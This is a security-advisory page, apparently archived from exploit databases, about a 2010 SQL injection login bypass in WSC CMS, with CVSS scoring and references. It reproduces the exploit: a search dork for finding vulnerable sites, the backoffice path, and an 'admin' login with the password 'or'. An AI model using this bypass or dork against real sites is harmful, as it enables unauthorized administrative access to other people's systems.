WSC CMS (Bypass) SQL Injection Vulnerability

2010-02-25 / 2010-02-26
Credit: Phenom
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: WSC CMS (Bypass) SQL Injection Vulnerability # Date: 2010-02-19 # Author: Phenom # Software Link: # Version: # Tested on: windows xp sp3 # CVE : # Code : ------------------------------------------------------ ------------------------------------------------------ _____ _ | __ \| | | |__) | |__ ___ _ __ ___ _ __ ___ | ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \ | | | | | | __/ | | | (_) | | | | | | |_| |_| |_|\___|_| |_|\/__/|_| |_| |_| ------------------------------------------------------ ------------------------------------------------------ ############### WSC CMS (Bypass) SQL Injection Vulnerability ################################### # # Author : Phenom # # mail : sys.phenom.sys[at]gmail[dot]com # # Dork : Realizzato con WSC CMS by Dynamicsoft # ################################################################################################ ####### Exploit ################################################################################ # # 1- http://server/public/backoffice # # 2- login with "admin" as user name and 'or' as password # ################################################################################################

References:

http://xforce.iss.net/xforce/xfdb/56406
http://www.securityfocus.com/bid/38335
http://www.exploit-db.com/exploits/11507
http://secunia.com/advisories/38698
http://packetstormsecurity.org/1002-exploits/wsccms-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top